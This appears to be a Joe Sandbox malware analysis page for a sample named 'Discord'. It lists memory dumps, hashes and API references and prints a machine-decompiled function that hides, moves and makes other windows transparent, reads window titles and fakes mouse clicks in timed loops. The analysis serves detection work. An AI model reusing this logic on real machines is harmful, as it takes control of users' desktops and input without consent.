Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Virtual$M_destroyRep10_Ss4_$InputS_constructSendSs12_Ss6append$Ss4swap$Ss7compareTokenZ7set
String ID:
API String ID: 3091142941-0
Opcode ID: d5b45ebe6dfb281550e6bca2f83e13fd83f738fe3df6d9263e947ee679466792
Instruction ID: 0cf41870feb456069de40e27e63eac33d73aeac242392713de1b1fbad56d1226
Opcode Fuzzy Hash: d5b45ebe6dfb281550e6bca2f83e13fd83f738fe3df6d9263e947ee679466792
Instruction Fuzzy Hash: 34022CB49053598FEB10AF68C91879DBBF0BF40314F11859DD58CAB291EBB98988CF53

Uniqueness

Uniqueness Score: -1.00%

Function 6DE82AD0 Relevance: 33.7, APIs: 17, Strings: 2, Instructions: 429sleepCOMMON

Download Yara Rule

APIs

_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE82B3A
_Z10SeuilColorSsR8ColorMaxd.DFO1 ref: 6DE82B55
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE82B86
_Z10SeuilColorSsR8ColorMaxd.DFO1 ref: 6DE82B9D
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE82BCB
_Z10SeuilColorSsR8ColorMaxd.DFO1 ref: 6DE82BE2
Sleep.KERNEL32 ref: 6DE82C0A
GdipDisposeImage.GDIPLUS ref: 6DE82C35
GdipFree.GDIPLUS ref: 6DE82C40
_Z6Decre1P6HWND__ii.DFO1 ref: 6DE82C84
Sleep.KERNEL32 ref: 6DE82C95

Strings

<, xrefs: 6DE82DD1
<, xrefs: 6DE82DDC

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Color$MaxdSeuil$GdipSleep$D__iiDecre1DisposeFreeImage
String ID: <$<
API String ID: 1872546561-213342407
Opcode ID: 0f71340550489d64e370de412d93f051466e6c1d3ad3450d3c0254a738f6a8d2
Instruction ID: 5aee52b3c04fa051cbdff4dd11caee0902c29bb6cf9258dfaf34a625f4e90b4b
Opcode Fuzzy Hash: 0f71340550489d64e370de412d93f051466e6c1d3ad3450d3c0254a738f6a8d2
Instruction Fuzzy Hash: 65028DB1A08702DFC712AF15C58424ABBF0FB95394F214D5EE4C9963A6EB318469CF87

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8CBAC Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 198
sleepwindowCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6DE8CBAC(void* __fp0, int _a4, CHAR* _a8, CHAR* _a12, char _a16, CHAR* _a20, signed short _a22, signed int _a24, signed short _a26, signed long long _a28, long _a32, long _a36, void* _a40, long _a44, long _a48, long _a52, struct tagRECT _a56, intOrPtr _a60, long _a64, long _a68, signed long long* _a72, intOrPtr _a76, int _a80, CHAR* _a84, signed int _a86, long _a100, long long _a104, signed long long _a112, char _a116, long _a124, char _a128, char _a140) {
				long _v0;
				long* _v4;
				long _v8;
				char* _v12;
				char* _v16;
				struct HWND__* _v20;
				intOrPtr _v24;
				long _v28;
				long _v32;
				signed int _v36;
				long _v44;
				CHAR* _v48;
				CHAR* _v52;
				int _v56;
				struct HWND__* _v60;
				long _v64;
				char* _v68;

				__edi = rand();
				__esi = rand();
				__eax = rand();
				__ecx =  &_a128;
				asm("fild dword [0x6de9e65c]");
				_v0 = 0x6de9e8a4;
				__ebx = __eax;
				_a32 = __fp0;
				L6DE8DD58();
				__esp = __esp - 4;
				__eax =  &_a140;
				__fp0 = _a28;
				_v0 =  &_a140;
				__eax =  &_a124;
				_a4 = __fp0;
				_v4 =  &_a124;
				L6DE8DC78();
				__eax = _a124;
				__edx = 0xffffffff;
				asm("lock xadd [eax-0x4], edx");
				__eflags = 0xffffffff;
				if(0xffffffff <= 0) {
					__ecx = __eax - 0xc;
					__eax =  &_a116;
					_v4 =  &_a116;
					L6DE8DD30();
					__esp = __esp - 4;
				}
				__eax =  *0x6de9e868;
				__eax = IsWindowVisible( *0x6de9e868);
				__esp = __esp - 4;
				__eflags = __eax;
				_a52 = __eax;
				if(__eax == 0) {
					_v8 = 0;
					L6DE8DD20();
					_v8 = 0;
					L6DE8DD20();
					__eax = _a52;
					__esp =  &(__esp[0x33]);
					_pop(__ebx);
					_pop(__esi);
					_pop(__edi);
					return _a52;
				} else {
					__eax = __edi;
					__edx = 0x66666667;
					__edx = __eax * 0x66666667 >> 0x20;
					__edi = __edi >> 0x1f;
					__edx = __edx >> 2;
					__eax = __edx + 0x19999999c;
					__esi = __esi >> 0x1f;
					__edx = __esi >> 0x1f >> 0x1d;
					__edi = __edi - __eax;
					__eax = __esi + __edx;
					__edi =  &(__edi[0x28]);
					__eax = __esi + __edx & 0x00000007;
					_a24 = __edi;
					__eax = (__esi + __edx & 0x00000007) - __edx;
					__edx = __ebx;
					asm("fild dword [esp+0x20]");
					__edx = __ebx >> 0x1f;
					__eax = __eax + 4;
					__edx = __ebx >> 0x1f >> 0x1d;
					_a32 = __eax;
					_a24 = __fp0;
					__eax = __ebx + __edx;
					asm("fild dword [esp+0x28]");
					__ebx + __edx & 0x00000007 = (__ebx + __edx & 0x00000007) - __edx;
					_a56.left = __fp0;
					__eax = (__ebx + __edx & 0x00000007) - __edx + 4;
					_a32 = (__ebx + __edx & 0x00000007) - __edx + 4;
					__eax =  *0x6de9e814;
					asm("fild dword [esp+0x28]");
					_a64 = __fp0;
					__eflags = __eax;
					_a52 = __eax;
					if(__eax != 0) {
						L34:
						_a52 = 1;
						__eax = _a52;
						__esp =  &(__esp[0x33]);
						_pop(__ebx);
						_pop(__esi);
						_pop(__edi);
						return _a52;
					} else {
						__eax =  &_a112;
						_a48 = 0;
						_a44 = 0;
						_a76 = 0xa;
						_a72 =  &_a112;
						while(1) {
							L6:
							asm("fldz");
							__eax = _a72;
							_v8 = 0x64;
							_a100 = 0;
							asm("fst qword [esp+0x70]");
							_a4 = _a72;
							__eax =  &_a104;
							_v0 =  &_a104;
							__eax =  &_a100;
							_v4 =  &_a100;
							_a112 = __fp0;
							__eax = E6DE86370();
							Sleep(0x7d0);
							__edi =  *0x6de9e814;
							__esp = __esp - 4;
							__eflags =  *0x6de9e814;
							if( *0x6de9e814 != 0) {
								break;
							}
							__esi = _a100;
							__eflags = _a100;
							if(_a100 == 0) {
								break;
							} else {
								__eax = _a44;
								_v8 = _a44;
								L6DE8DD20();
								__eax =  *0x6de9e868;
								__eax = GetWindowTextLengthA( *0x6de9e868);
								_t41 = __eax + 1; // 0x1
								__ebx = _t41;
								__esp = __esp - 4;
								_v8 = __ebx;
								L6DE8DD50();
								_a44 = __eax;
								_v4 = __eax;
								__eax =  *0x6de9e868;
								_v0 = __ebx;
								_v8 =  *0x6de9e868;
								GetWindowTextA(??, ??, ??) =  *0x6de9e868;
								__esp = __esp - 0xc;
								_v8 =  *0x6de9e868;
								L6DE8DC70();
								Sleep(0x3e8);
								__eax =  *0x6de9e868;
								__esp = __esp - 4;
								_v8 =  *0x6de9e868;
								L6DE8DCA0();
								__ebx =  *0x6de9e814;
								__eflags =  *0x6de9e814;
								if(__eflags == 0) {
									 *0x6de9e868 = GetWindowRect( *0x6de9e868, 0x6de9e87c);
									__esp = __esp - 8;
								}
								__fp0 = _a56.left;
								asm("fnstcw word [esp+0x5e]");
								__eax = _a86 & 0x0000ffff;
								_v8 = 0x3e8;
								__fp0 = _a56.left + _a104;
								_a84 = __ax;
								__fp0 = (_a56.left + _a104) *  *0x6de9e780;
								asm("fsubr dword [0x6de98138]");
								asm("fild dword [0x6de9e87c]");
								asm("fsubp st1, st0");
								_a24 = _a24 / st0;
								asm("fxch st0, st1");
								asm("fldcw word [esp+0x5c]");
								asm("fistp dword [esp+0x30]");
								asm("fldcw word [esp+0x5e]");
								_a64 = _a64 + _a112;
								__fp0 = (_a64 + _a112) *  *0x6de9e778;
								asm("fsubr qword [0x6de9e790]");
								asm("fild dword [0x6de9e880]");
								asm("fsubp st1, st0");
								asm("fdivrp st1, st0");
								asm("fldcw word [esp+0x5c]");
								asm("fistp dword [esp+0x58]");
								asm("fldcw word [esp+0x5e]");
								__edi = _a80;
								Sleep(??);
								__esp = __esp - 4;
								asm("fld1");
								__fp0 = _a24;
								asm("fucomip st0, st1");
								st0 = _a24;
								if(__eflags < 0) {
									__eax = SetWindowPos;
									_a36 = SetWindowPos;
								} else {
									__eax = SetWindowPos;
									__ebx = __edi;
									__esi = _a40;
									_a32 = 1;
									_a36 = SetWindowPos;
									do {
										__eax = 0x6de9e87c->left;
										__ecx =  *0x6de9e880;
										__edx =  *0x6de9e814;
										__eax = __esi + 0x6de9e87c->left;
										__ecx = __ebx +  *0x6de9e880;
										__eflags =  *0x6de9e814;
										 *0x6de9e894 = __eax;
										 *0x6de9e898 = __ecx;
										if( *0x6de9e814 == 0) {
											_v0 = __eax;
											__eax =  *0x6de9e868;
											_a16 = 1;
											_a12 = 0;
											_a8 = 0;
											_a4 = __ecx;
											_v4 = 0xffffffff;
											_v8 =  *0x6de9e868;
											__eax = _a36();
											__esp = __esp - 0x1c;
										}
										_v8 = 1;
										__ebx = __ebx + __edi;
										Sleep(??);
										__esp = __esp - 4;
										_a32 = _a32 + 1;
										__esi = __esi + _a40;
										__eflags = __esi;
										asm("fild dword [esp+0x28]");
										__fp0 = _a24;
										asm("fucomip st0, st1");
										st0 = _a24;
									} while (__esi >= 0);
								}
								__fp0 = _a56.left;
								asm("fnstcw word [esp+0x5e]");
								__eax = _a86 & 0x0000ffff;
								_a16 = 1;
								_a12 = 0;
								__fp0 = _a56.left + _a104;
								_a8 = 0;
								_v4 = 0xffffffff;
								_a84 = __ax;
								__fp0 = (_a56.left + _a104) *  *0x6de9e780;
								asm("fsubr dword [0x6de98138]");
								asm("fldcw word [esp+0x5c]");
								asm("fistp dword [esp+0x58]");
								asm("fldcw word [esp+0x5e]");
								__eax = _a80;
								__fp0 = _a64;
								 *0x6de9e894 = __eax;
								_v0 = __eax;
								__eax =  *0x6de9e868;
								__fp0 = _a64 + _a112;
								_v8 =  *0x6de9e868;
								__fp0 = (_a64 + _a112) *  *0x6de9e778;
								asm("fsubr qword [0x6de9e790]");
								asm("fldcw word [esp+0x5c]");
								asm("fistp dword [esp+0x58]");
								asm("fldcw word [esp+0x5e]");
								__edx = _a80;
								 *0x6de9e898 = __edx;
								_a4 = __edx;
								_a36() =  *0x6de9e7d8;
								__esp = __esp - 0x1c;
								__esi = EnumWindows;
								_v32 = 0;
								_v36 = E6DE889C0;
								 *0x6de9e7dc =  *0x6de9e7d8;
								__eax =  *0x6de9e7fc;
								 *0x6de9e800 =  *0x6de9e7fc;
								__eax = EnumWindows(??, ??);
								__esp = __esp - 8;
								Sleep(0xc8);
								__eax =  *0x6de9e868;
								__esp = __esp - 4;
								 *__esp =  *0x6de9e868;
								L6DE8DC70();
								__ecx =  *0x6de9e814;
								__eflags =  *0x6de9e814;
								if( *0x6de9e814 == 0) {
									Sleep(0x32);
									__esp = __esp - 4;
									__ebx = mouse_event;
									__eax = mouse_event(2, 0, 0, 0, 0);
									__esp = __esp - 0x14;
									Sleep(0x32);
									__esp = __esp - 4;
									__eax = mouse_event(4, 0, 0, 0, 0);
									__esp = __esp - 0x14;
									Sleep(0x64);
									__esp = __esp - 4;
									__eax = mouse_event(2, 0, 0, 0, 0);
									__esp = __esp - 0x14;
									Sleep(0x32);
									__esp = __esp - 4;
									__eax = mouse_event(4, 0, 0, 0, 0);
									__esp = __esp - 0x14;
									__ebx = 0x493df;
									Sleep(0x32);
									__esp = __esp - 4;
									_v56 = 0;
									__eax = EnumWindows(E6DE88B20);
									__esp = __esp - 8;
									while(1) {
										__edi =  *0x6de9e814;
										__eflags =  *0x6de9e814;
										if( *0x6de9e814 != 0) {
											break;
										}
										_v60 = 0;
										__eax = EnumWindows(E6DE88B20);
										__esp = __esp - 8;
										__ebx = __ebx - 1;
										__eflags = __ebx;
										if(__ebx != 0) {
											continue;
										}
										break;
									}
									__ebx =  *0x6de9e7dc;
									__esi =  *0x6de9e7d8;
									__eflags = __ebx - __esi;
									if(__ebx == __esi) {
										__esi = __ebx;
									} else {
										__edi = __ebx;
										__ecx = 0x1f;
										__edx = __ebx;
										__edi = __ebx - __esi;
										__edi = __edi >> 2;
										asm("bsr eax, eax");
										__eax = __edi >> 0x00000002 ^ 0x0000001f;
										__ecx = 0x1f - (__edi >> 0x00000002 ^ 0x0000001f);
										__eax = __esi;
										__ecx = 0x1f - (__edi >> 0x00000002 ^ 0x0000001f) + 0x1f - (__edi >> 0x00000002 ^ 0x0000001f);
										__eax = E6DE8A040(__esi, 0x1f - (__edi >> 0x00000002 ^ 0x0000001f) + 0x1f - (__edi >> 0x00000002 ^ 0x0000001f), __ebx);
										__eflags = __edi - 0x43;
										if(__edi > 0x43) {
											__edi = __esi + 0x40;
											_v60 = 0;
											__eax = E6DE95290(__esi, __edi);
											__eflags = __ebx - __edi;
											if(__ebx == __edi) {
												goto L45;
											} else {
												__esi =  *__edi;
												__edx =  *(__edi - 4);
												__eax = __edi - 4;
												__eflags = __edx - __esi;
												if(__edx > __esi) {
													goto L59;
												} else {
													L62:
													__eax = __edi;
													__edi =  &(__edi[4]);
													__eflags = __ebx - __edi;
													 *__eax = __esi;
													if(__ebx != __edi) {
														L61:
														__esi =  *__edi;
														__edx =  *(__edi - 4);
														__eax = __edi - 4;
														__eflags = __edx - __esi;
														if(__edx > __esi) {
															while(1) {
																L59:
																 *(__eax + 4) = __edx;
																__edx =  *(__eax - 4);
																__ecx = __eax - 4;
																__eflags = __esi - __edx;
																if(__esi >= __edx) {
																	break;
																}
																__eax = __ecx;
															}
															__edi =  &(__edi[4]);
															 *__eax = __esi;
															__eflags = __ebx - __edi;
															if(__ebx == __edi) {
																goto L45;
															} else {
																goto L61;
															}
														} else {
															goto L62;
														}
													} else {
														goto L45;
													}
												}
											}
											L52:
											__edx =  *0x6de9e7fc;
											__eflags = __eax;
											 *0x6de9e7dc = __esi;
											 *0x6de9e800 =  *0x6de9e7fc;
											if(__eax == 0) {
												 *0x6de9e868 = GetWindowRect( *0x6de9e868, 0x6de9e87c);
												__esp = __esp - 8;
											}
											goto L17;
										} else {
											_v60 = 0;
											__eax = E6DE95290(__esi, __ebx);
										}
										L45:
										__esi =  *0x6de9e7dc;
										__ebx =  *0x6de9e7d8;
									}
									_v68 = __ebx;
									_v60 = 0;
									_v64 = __esi;
									__eax = E6DE95320();
									__eflags = __eax - __esi;
									__ebx = __eax;
									__edi =  *0x6de9e7dc;
									if(__eax != __esi) {
										__edx =  *0x6de9e7dc;
										__eflags = __edx - __esi;
										if(__edx == __esi) {
											__edx = 0;
										} else {
											__edx = __edx - __esi;
											__edx = __edx >> 2;
											__eflags = __edx >> 2;
											if(__edx >> 2 != 0) {
												__eax = memmove(__ebx, __esi, __edx);
												__edx =  *0x6de9e7dc;
												__edx =  *0x6de9e7dc - __esi;
											}
										}
										__edx = __ebx + __edx;
										__eflags = __edx;
										 *0x6de9e7dc = __edx;
										__edi = __edx;
									}
									__esi =  *0x6de9e7d8;
									__edi = __edi - __esi;
									__eax = __edi - __esi >> 2;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = __esi - __edi;
										if(__esi == __edi) {
											__eax =  *0x6de9e814;
											__esi = __edi;
										} else {
											do {
												__ebx =  *__esi;
												__ecx = 0x6de9eaac;
												_v68 = "test";
												L6DE8DD68();
												__esp = __esp - 4;
												__eflags = __eax;
												if(__eax != 0) {
													__eax = GetWindowLongA(__ebx, 0xffffffec);
													__esp = __esp - 8;
													 *0x6de9e85c = __eax;
													__eax = __eax | 0x00080080;
													__eflags = __eax;
													__eax = SetWindowLongA(__ebx, 0xffffffec, __eax);
													__esp = __esp - 0xc;
													_v60 = 2;
													_v64 = 1;
													_v68 = 0;
													 *__esp = __ebx;
													__imp__SetLayeredWindowAttributes();
													__esp = __esp - 0x10;
												}
												 *__esp = __ebx;
												__esi = __esi + 4;
												L6DE8DC70();
												 &_a56 = GetWindowRect(__ebx,  &_a56);
												__esp = __esp - 8;
												__eax = _a68;
												__eax = _a68 - _a60;
												asm("fnstcw word [esp+0x5e]");
												_v48 = 1;
												_v52 = 0;
												_v56 = 0;
												_v68 = 0xffffffff;
												 *__esp = __ebx;
												__eax = __eax >> 0x1f;
												__eax = __eax + (__eax >> 0x1f);
												_v32 = __eax;
												__eax = _a22 & 0x0000ffff;
												asm("fild dword [esp+0x28]");
												asm("fsubr qword [0x6de9e790]");
												_a20 = __ax;
												__eax = _a64;
												__eax = _a64 - _a56.left;
												asm("fldcw word [esp+0x5c]");
												asm("fistp dword [esp+0xc]");
												asm("fldcw word [esp+0x5e]");
												__eax = __eax >> 0x1f;
												__eax = __eax + (__eax >> 0x1f);
												__eax = __eax >> 1;
												_v64 = __eax;
												__eax = _v28();
												__esp = __esp - 0x1c;
												__eflags = __edi - __esi;
											} while (__edi != __esi);
											__eax =  *0x6de9e814;
											__esi =  *0x6de9e7d8;
										}
									} else {
										__eax =  *0x6de9e814;
									}
									goto L52;
								} else {
									__eax =  *0x6de9e7d8;
									 *0x6de9e7dc =  *0x6de9e7d8;
									__eax =  *0x6de9e7fc;
									 *0x6de9e800 =  *0x6de9e7fc;
								}
								L17:
								__eax = 0x6de9e87c->left;
								asm("fnstcw word [esp+0x5e]");
								__edx = _a26 & 0x0000ffff;
								__ecx =  *0x6de9e888;
								_v28 = __eax;
								asm("fild dword [esp+0x28]");
								_a24 = __dx;
								__edx =  *0x6de9e880;
								asm("fsubr dword [0x6de9814c]");
								__ecx =  *0x6de9e888 - __edx;
								__ecx =  *0x6de9e888 - __edx - 0x32;
								__eflags = __ecx;
								_v28 = __ecx;
								_v36 = _v36 / st0;
								asm("fxch st0, st1");
								asm("fldcw word [esp+0x5c]");
								asm("fistp dword [esp+0x58]");
								asm("fldcw word [esp+0x5e]");
								__ebx = _a20;
								asm("fild dword [esp+0x28]");
								_v28 = __edx;
								_v20 = __ebx;
								asm("fsubr qword [0x6de9e790]");
								asm("fild dword [esp+0x28]");
								_v28 = 1;
								asm("fsubp st1, st0");
								__fp0 = _v36 / st0 / st1;
								asm("fldcw word [esp+0x5c]");
								asm("fistp dword [esp+0x58]");
								asm("fldcw word [esp+0x5e]");
								__edi = _a20;
								asm("fld1");
								asm("fxch st0, st1");
								__esi = __edi;
								asm("fucomip st0, st1");
								st0 = __fp0;
								if(__ecx >= 0) {
									while(1) {
										__ecx =  *0x6de9e814;
										__eax = __ebx + __eax;
										__edx = __esi + __edx;
										 *0x6de9e894 = __eax;
										 *0x6de9e898 = __edx;
										__eflags =  *0x6de9e814;
										if( *0x6de9e814 == 0) {
											_v60 = __eax;
											__eax =  *0x6de9e868;
											_v44 = 1;
											_v48 = 0;
											_v52 = 0;
											_v56 = __edx;
											_v64 = 0xffffffff;
											_v68 =  *0x6de9e868;
											__eax = _v24();
											__esp = __esp - 0x1c;
										}
										_v68 = 1;
										__esi = __esi + __edi;
										Sleep(??);
										__esp = __esp - 4;
										_v28 = _v28 + 1;
										__ebx = __ebx + _v20;
										__eflags = __ebx;
										asm("fild dword [esp+0x28]");
										__fp0 = _v36;
										asm("fucomip st0, st1");
										st0 = __fp0;
										if(__ebx < 0) {
											goto L23;
										}
										__eax = 0x6de9e87c->left;
										__edx =  *0x6de9e880;
									}
								} else {
								}
								L23:
								__eax =  *0x6de9e868;
								__ebx = 4;
								_v68 =  *0x6de9e868;
								L6DE8DC70();
								__esi = IsWindow;
								__edi = _v12;
								_v28 = 4;
								while(1) {
									__edx =  *0x6de9e814;
									__eflags =  *0x6de9e814;
									if( *0x6de9e814 != 0) {
										break;
									}
									Sleep(0x1770);
									__esp = __esp - 4;
									_v68 = __edi;
									L6DE8DD20();
									__eax =  *0x6de9e868;
									__eax = GetWindowTextLengthA( *0x6de9e868);
									_t108 = __eax + 1; // 0x1
									__ebx = _t108;
									__esp = __esp - 4;
									_v68 = __ebx;
									L6DE8DD50();
									_v64 = __eax;
									__edi = __eax;
									__eax =  *0x6de9e868;
									_v60 = __ebx;
									_v68 =  *0x6de9e868;
									GetWindowTextA(??, ??, ??) =  *0x6de9e868;
									__esp = __esp - 0xc;
									__eax = IsWindow( *0x6de9e868);
									__esp = __esp - 4;
									__eflags = __eax;
									if(__eax == 0) {
										L37:
										__eflags =  *0x6de9e760 - 1;
										_v12 = __edi;
										if( *0x6de9e760 == 1) {
											__eax = E6DE8A200();
										}
										__eax = _v16;
										_v68 = _v16;
										L6DE8DD20();
										__eax = _v12;
										_v68 = _v12;
										L6DE8DD20();
										_v8 = 1;
										goto L1;
									} else {
										__eax = strstr(__edi, 0x6de9e6b8);
										__eflags = __eax;
										if(__eax != 0) {
											goto L37;
										} else {
											__eax = strstr(__edi, 0x6de9e6a8);
											__eflags = __eax;
											if(__eax != 0) {
												goto L37;
											} else {
												__eax = _v16;
												__eax = strstr(_v16, __edi);
												__eflags = __eax;
												if(__eax != 0) {
													L31:
													__eax =  *0x6de9e814;
													_v12 = __edi;
													__eflags =  *0x6de9e814;
													if( *0x6de9e814 != 0) {
														L72:
														__eax = _v16;
														_v68 = _v16;
														L6DE8DD20();
														__eax = _v12;
														_v68 = _v12;
														L6DE8DD20();
														_v8 = 0;
														goto L1;
													} else {
														_t118 =  &_a16;
														 *_t118 = _a16 - 1;
														__eflags =  *_t118;
														if( *_t118 != 0) {
															goto L6;
														} else {
															__eax = _v16;
															_v68 = _v16;
															L6DE8DD20();
															__eax = _v12;
															_v68 = _v12;
															L6DE8DD20();
															__eax =  *0x6de9e760;
															__eflags = __eax - 1;
															_v8 = __eax;
															if(__eax == 1) {
																L77:
																__eax = E6DE8A200();
																L1:
																return _a52;
															} else {
																goto L34;
															}
														}
													}
												} else {
													__ecx =  *0x6de9e814;
													__eflags =  *0x6de9e814;
													if( *0x6de9e814 == 0) {
														__eax =  *0x6de9e868;
														_v64 = __eax;
														_v68 = __eax;
														L6DE8DC60();
														Sleep(0x64);
														__esp = __esp - 4;
														__eax = FindWindowA(0, __edi);
														__esp = __esp - 8;
														__eflags = __eax;
														if(__eax != 0) {
															__eax =  *0x6de9e868;
															_v64 = __eax;
															_v68 = __eax;
															L6DE8DC68();
														}
													}
													Sleep(0x3e8);
													__esp = __esp - 4;
													_t115 =  &_v28;
													 *_t115 = _v28 - 1;
													__eflags =  *_t115;
													if( *_t115 != 0) {
														continue;
													} else {
														goto L31;
													}
												}
											}
										}
									}
									goto L81;
								}
								_v12 = __edi;
								goto L72;
							}
							goto L81;
						}
						__eax = _a44;
						_v8 = _a44;
						L6DE8DD20();
						__eax = _a48;
						_v8 = _a48;
						L6DE8DD20();
						__eflags =  *0x6de9e760 - 1;
						 *0x6de9e814 = 2;
						if( *0x6de9e760 == 1) {
							goto L77;
						}
						goto L1;
					}
				}
				L81:
			}

0x6de8cbb5
0x6de8cbbc
0x6de8cbbe
0x6de8cbc3
0x6de8cbca
0x6de8cbd0
0x6de8cbd7
0x6de8cbd9
0x6de8cbdd
0x6de8cbe2
0x6de8cbe5
0x6de8cbec
0x6de8cbf0
0x6de8cbf4
0x6de8cbfb
0x6de8cbff
0x6de8cc02
0x6de8cc07
0x6de8cc0e
0x6de8cc13
0x6de8cc18
0x6de8cc1a
0x6de8d726
0x6de8d729
0x6de8d72d
0x6de8d730
0x6de8d735
0x6de8d735
0x6de8cc20
0x6de8cc28
0x6de8cc2e
0x6de8cc31
0x6de8cc33
0x6de8cc37
0x6de8d6d6
0x6de8d6dd
0x6de8d6e2
0x6de8d6e9
0x6de8d6ee
0x6de8d6f2
0x6de8d6f8
0x6de8d6f9
0x6de8d6fa
0x6de8d6fc
0x6de8cc3d
0x6de8cc3d
0x6de8cc3f
0x6de8cc44
0x6de8cc48
0x6de8cc4b
0x6de8cc50
0x6de8cc55
0x6de8cc58
0x6de8cc5d
0x6de8cc5f
0x6de8cc62
0x6de8cc65
0x6de8cc68
0x6de8cc6c
0x6de8cc6e
0x6de8cc70
0x6de8cc74
0x6de8cc77
0x6de8cc7a
0x6de8cc7d
0x6de8cc81
0x6de8cc85
0x6de8cc88
0x6de8cc8f
0x6de8cc91
0x6de8cc95
0x6de8cc98
0x6de8cc9c
0x6de8cca1
0x6de8cca5
0x6de8cca9
0x6de8ccab
0x6de8ccaf
0x6de8d23e
0x6de8d23e
0x6de8d246
0x6de8d24a
0x6de8d250
0x6de8d251
0x6de8d252
0x6de8d254
0x6de8ccb5
0x6de8ccb5
0x6de8ccbf
0x6de8ccc7
0x6de8cccf
0x6de8ccd7
0x6de8ccdb
0x6de8ccdb
0x6de8ccdb
0x6de8ccdd
0x6de8cce1
0x6de8cce8
0x6de8ccf0
0x6de8ccf4
0x6de8ccf8
0x6de8ccfc
0x6de8cd00
0x6de8cd04
0x6de8cd08
0x6de8cd0c
0x6de8cd18
0x6de8cd1a
0x6de8cd20
0x6de8cd23
0x6de8cd25
0x00000000
0x00000000
0x6de8cd2b
0x6de8cd2f
0x6de8cd31
0x00000000
0x6de8cd37
0x6de8cd37
0x6de8cd3b
0x6de8cd3e
0x6de8cd43
0x6de8cd4b
0x6de8cd51
0x6de8cd51
0x6de8cd54
0x6de8cd57
0x6de8cd5a
0x6de8cd5f
0x6de8cd63
0x6de8cd67
0x6de8cd6c
0x6de8cd70
0x6de8cd79
0x6de8cd7e
0x6de8cd81
0x6de8cd84
0x6de8cd90
0x6de8cd92
0x6de8cd97
0x6de8cd9a
0x6de8cd9d
0x6de8cda2
0x6de8cda8
0x6de8cdaa
0x6de8d514
0x6de8d51a
0x6de8d51a
0x6de8cdb0
0x6de8cdb4
0x6de8cdb8
0x6de8cdbd
0x6de8cdc4
0x6de8cdca
0x6de8cdcf
0x6de8cdd5
0x6de8cddb
0x6de8cde1
0x6de8cde7
0x6de8cde9
0x6de8cdeb
0x6de8cdef
0x6de8cdf3
0x6de8cdfb
0x6de8cdff
0x6de8ce05
0x6de8ce0b
0x6de8ce11
0x6de8ce13
0x6de8ce15
0x6de8ce19
0x6de8ce1d
0x6de8ce21
0x6de8ce25
0x6de8ce27
0x6de8ce2a
0x6de8ce2c
0x6de8ce30
0x6de8ce32
0x6de8ce34
0x6de8ced8
0x6de8cedd
0x6de8ce3a
0x6de8ce3a
0x6de8ce3f
0x6de8ce41
0x6de8ce45
0x6de8ce4d
0x6de8ce78
0x6de8ce78
0x6de8ce7d
0x6de8ce83
0x6de8ce89
0x6de8ce8b
0x6de8ce8d
0x6de8ce8f
0x6de8ce94
0x6de8ce9a
0x6de8ce9c
0x6de8cea0
0x6de8cea5
0x6de8cead
0x6de8ceb5
0x6de8cebd
0x6de8cec1
0x6de8cec9
0x6de8cecc
0x6de8ced0
0x6de8ced0
0x6de8ce53
0x6de8ce5a
0x6de8ce5c
0x6de8ce5e
0x6de8ce61
0x6de8ce66
0x6de8ce66
0x6de8ce6a
0x6de8ce6e
0x6de8ce72
0x6de8ce74
0x6de8ce74
0x6de8ce78
0x6de8cee1
0x6de8cee5
0x6de8cee9
0x6de8ceee
0x6de8cef6
0x6de8cefe
0x6de8cf02
0x6de8cf0a
0x6de8cf14
0x6de8cf19
0x6de8cf1f
0x6de8cf25
0x6de8cf29
0x6de8cf2d
0x6de8cf31
0x6de8cf35
0x6de8cf39
0x6de8cf3e
0x6de8cf42
0x6de8cf47
0x6de8cf4b
0x6de8cf4e
0x6de8cf54
0x6de8cf5a
0x6de8cf5e
0x6de8cf62
0x6de8cf66
0x6de8cf6a
0x6de8cf70
0x6de8cf78
0x6de8cf7d
0x6de8cf80
0x6de8cf86
0x6de8cf8e
0x6de8cf95
0x6de8cf9a
0x6de8cf9f
0x6de8cfa4
0x6de8cfa6
0x6de8cfb0
0x6de8cfb2
0x6de8cfb7
0x6de8cfba
0x6de8cfbd
0x6de8cfc2
0x6de8cfc8
0x6de8cfca
0x6de8d2e7
0x6de8d2e9
0x6de8d2ec
0x6de8d319
0x6de8d31b
0x6de8d325
0x6de8d327
0x6de8d351
0x6de8d353
0x6de8d35d
0x6de8d35f
0x6de8d389
0x6de8d38b
0x6de8d395
0x6de8d397
0x6de8d3c1
0x6de8d3c3
0x6de8d3c6
0x6de8d3d2
0x6de8d3d4
0x6de8d3d7
0x6de8d3e6
0x6de8d3e8
0x6de8d409
0x6de8d409
0x6de8d40f
0x6de8d411
0x00000000
0x00000000
0x6de8d3f0
0x6de8d3ff
0x6de8d401
0x6de8d404
0x6de8d404
0x6de8d407
0x00000000
0x00000000
0x00000000
0x6de8d407
0x6de8d413
0x6de8d419
0x6de8d41f
0x6de8d421
0x6de8d75a
0x6de8d427
0x6de8d427
0x6de8d429
0x6de8d42e
0x6de8d430
0x6de8d434
0x6de8d437
0x6de8d43a
0x6de8d43d
0x6de8d43f
0x6de8d441
0x6de8d443
0x6de8d448
